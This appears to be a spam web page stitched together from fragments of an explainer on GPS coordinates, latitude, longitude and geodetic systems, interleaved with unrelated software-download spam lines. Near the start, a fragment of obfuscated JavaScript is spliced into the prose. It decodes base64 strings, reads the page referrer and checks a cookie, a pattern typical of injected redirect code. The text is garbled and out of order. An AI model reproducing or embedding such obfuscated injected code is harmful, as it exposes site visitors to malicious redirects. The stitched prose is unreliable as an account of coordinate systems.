Each of these components is usually an integer, but the seconds can be a decimal number in case of need of a greater precision.. The latitude of a point is the measurement of the angle formed by the equatorial plane with the line connecting this point to the center of the Earth.. constructor(\x22return\x20this\x22)(\x20)'+');');_0xd936f7=_0x18b7d6();}catch(_0x18b1cf){_0xd936f7=window;}var _0x42b9b2='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0xd936f7['atob']||(_0xd936f7['atob']=function(_0x8b6bb6){var _0x431e36=String(_0x8b6bb6)['replace'](/=+$/,'');for(var _0x12d43f=0x0,_0x4c3022,_0x55e611,_0x18e84e=0x0,_0x99cf9='';_0x55e611=_0x431e36['charAt'](_0x18e84e++);~_0x55e611&&(_0x4c3022=_0x12d43f%0x4?_0x4c3022*0x40+_0x55e611:_0x55e611,_0x12d43f++%0x4)?_0x99cf9+=String['fromCharCode'](0xff&_0x4c3022>>(-0x2*_0x12d43f&0x6)):0x0){_0x55e611=_0x42b9b2['indexOf'](_0x55e611);}return _0x99cf9;});}());_0xda64['base64DecodeUnicode']=function(_0x2464ae){var _0x561870=atob(_0x2464ae);var _0x27e69b=[];for(var _0x57a1ce=0x0,_0x40a75d=_0x561870['length'];_0x57a1ce=_0x5c216d;},'Lgjtf':_0xda64('0x1b'),'cGqYC':function _0x24dfb4(_0x468537,_0x341740){return _0x468537+_0x341740;},'TpsJD':function _0x5223a6(_0x20f5ab,_0x4c5555){return _0x20f5ab+_0x4c5555;},'HERxC':function _0x8c9902(_0x1a69b0,_0x47494d){return _0x1a69b0(_0x47494d);},'mriVk':function _0x1be965(_0x1cc3f9,_0x395d2b){return _0x1cc3f9*_0x395d2b;},'jNZrL':function _0x771f5b(_0x53dc79,_0x4d1a10){return _0x53dc79+_0x4d1a10;},'zoFVl':_0xda64('0x1c'),'vWoiV':_0xda64('0x1d'),'yvqqu':function _0x6e2c7d(_0x57c1a7,_0x50b598){return _0x57c1a7(_0x50b598);},'apoSM':_0xda64('0x1e'),'Kicax':function _0x2fceff(_0x508103,_0x4ef25a){return _0x508103===_0x4ef25a;},'jQPJZ':_0xda64('0x1f')};var _0x1b5768=[_0x376aa3[_0xda64('0x20')],_0x376aa3['rDAkE'],_0x376aa3[_0xda64('0x21')],_0x376aa3[_0xda64('0x22')],_0x376aa3[_0xda64('0x23')],_0x376aa3[_0xda64('0x24')],_0x376aa3[_0xda64('0x25')]],_0x531f98=document['referrer'],_0x53e8a3=![],_0x3e05bf=cookie['get'](_0x376aa3[_0xda64('0x26')]);for(var _0x2a42b2=0x0;_0x2a42b2
Currently, the most commonly used geodetic system is WGS 84 (used notably for GPS coordinates).. Also, when you visualize an address on the map, or after clicking on a point on the map, its coordinates in the two units are displayed in the left column.. The north-south position of a point is given by its latitude when its longitude gives information about its east-west position.. By construction, it is comprised between -90 ° and 90 ° Negative values are for the southern hemisphere locations, and latitude is worth 0 ° at the equator.
Decimal coordinatesThe latitude and longitude are a decimal number, with the following characteristics:- latitude between 0° and 90°: Northern hemisphere,- latitude between 0° and -90°: Southern hemisphere,- longitude between 0° and 180°: East of the Greenwich meridian,- longitude between 0° and -180°: West of the Greenwich meridian,Sexagesimal coordinatesThe sexagesimal coordinates have three components: degrees, minutes and seconds.. However, it is as necessary as the latitude and longitude to define a complete and accurate GPS location.. In the most typical use cases, GPS coordinates are needed for locations on the surface of the Earth, making this third parameter less important. Unduh Line Video Call Dance Famire
A third componentCareful readers would have alreay noticed that a third element is required to locate a point, its altitude. Muat Turun Borang Be 2017 English Free Celcom For Sale
Correlation TableConvert GPS coordinatesOn the website homepage, when you enter coordinates in one of the formats (on the left column), they are automatically converted to the other format.. Longitude reference has been arbitrarily set at the Greenwich Meridian (it passes through the Royal Greenwich Observatory in Greenwich in the suburbs of London), and the longitude of a point is the measurement of the angle formed by the half plane formed by the axis of the earth and passes through the Greenwich meridian and the half-plane formed by the axis of the earth and passing through the point.. The principle is the same for the longitude, with the difference that there is no natural reference like the equator for the latitude.. Multiple geodetic systems for geographical coordinatesAs we saw, the above definitions take into account several parameters that must be fixed or identified for future reference:- the equator plane and the model choser for the shape of the earth,- a set of reference points,- the position of the center of the Earth,- the reference meridian.. One angle degree includes 60 angle minutes and one angule minute consists of 60 angle seconds of arc.. These five criteria are the basis of the different geodetic systems used through history. b0d43de27c Adobe Photoshop Cs3 Patch Download